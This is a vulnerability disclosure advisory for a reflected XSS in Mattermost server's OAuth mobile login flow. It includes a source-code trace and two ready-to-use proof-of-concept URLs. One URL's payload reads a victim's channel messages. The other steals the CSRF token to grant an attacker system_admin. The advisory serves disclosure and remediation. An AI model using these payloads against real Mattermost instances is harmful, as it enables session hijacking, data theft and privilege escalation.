The OAuth flow implemented in Mattermost server v5.32 > v5.36 is affected by a reflected XSS. An unauthenticated attacker might gain access to the victim’s session.
“Mattermost is an open source, self-hosted Slack-alternative. As an alternative to proprietary SaaS messaging, Mattermost brings all your team communication into one place, making it searchable and accessible anywhere.”
For more information visit https://mattermost.org/about/.
The application fails to sanitize an HTTP query parameter before reflecting it within the HTML response during the OAuth flow.
|
|
The file “/web/oauth.go” (https://github.com/mattermost/mattermost-server/blob/master/web/oauth.go) contains the function “completeOAuth” which on line 284 values the variable “redirectURL” with the parameter “redirect_to” [1] of the query string of the HTTP GET request. At line 291 the function “utils.RenderMobileError” is called, with “redirectURL” [2] as parameter.
|
|
The function “RenderMobileError” is contained within the file utils/api.go at line 103, and the fourth argument of this function is “redirectURL”. At line 104 the “RenderMobileMessage” function is called and at line 111 the variable “redirectURL” is concatenated (without any modification) with another string argument of the “RenderMobileMessage” function [1].
|
|
Inside the “RenderMobileMessage” function (declared at line 117 of utils/api.go) “fmt.Fprintln” is called to print the HTTP response and the HTML page is dynamically built concatenating the “message” variable [1] (second argument of the function).
Since the HTTP GET request parameter “redirect_to” is never sanitized and is appended to the HTML page, it is possible to trigger a reflected XSS.
In this PoC, the attacker reads the latest messages in a given channel. The output is shown as the content of an alert()
but could be sent to an attacker-controlled server in a real-world scenario.
<mattermost_url>
target MatterMost instance domain / IP, <user_id>
with the victim’s user_id, and <channel_id>
with the channel_id you want to read messages of:
http://<mattermost_url>/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src=%22%22%20onerror="var xhr = new XMLHttpRequest()%3bxhr.open('GET', '/api/v4/users/<user_id>/channels/<channel_id>/posts/unread?limit_after=30', true)%3bxhr.withCredentials = true%3bxhr.send(null)%3balert(xhr.responseText)%3b"%3E
In this PoC, the attacker sends to an administrator the malicious link, which, when visited, would change the role of the attacker’s user to system_admin
.
<mattermost_url>
target MatterMost instance domain / IP and <user_id>
with the user you want to promote to system_admin
:
http://<mattermost_url>/oauth/shielder/mobile_login?redirect_to=%22%3E%3Cimg%20src=%22%22%20onerror="var xhr = new XMLHttpRequest()%3bxhr.open('PUT', '/api/v4/users/<user_id>/roles', true)%3bxhr.withCredentials = true%3bxhr.setRequestHeader('X-CSRF-Token', document.cookie.match(new RegExp('(^| )'%2b'MMCSRF'%2b'=([^%3b]%2b)'))[2])%3bxhr.send(JSON.stringify('{\'roles\':\'system_user system_admin\'}'))%3b"%3E
user_id
has been used in step 1/admin_console/user_management/users
)An unauthenticated attacker might gain access to a privileged user session.
Upgrade Mattermost Server to version v5.34.5, v5.35.4, v5.36.1, and v5.37.0 or higher.
This report was subject to Shielder’s disclosure policy:
`zi0Black` of Shielder
This advisory was first published on https://www.shielder.com/it/advisories/mattermost-server-reflected-xss-oauth/
Data
26 luglio 2021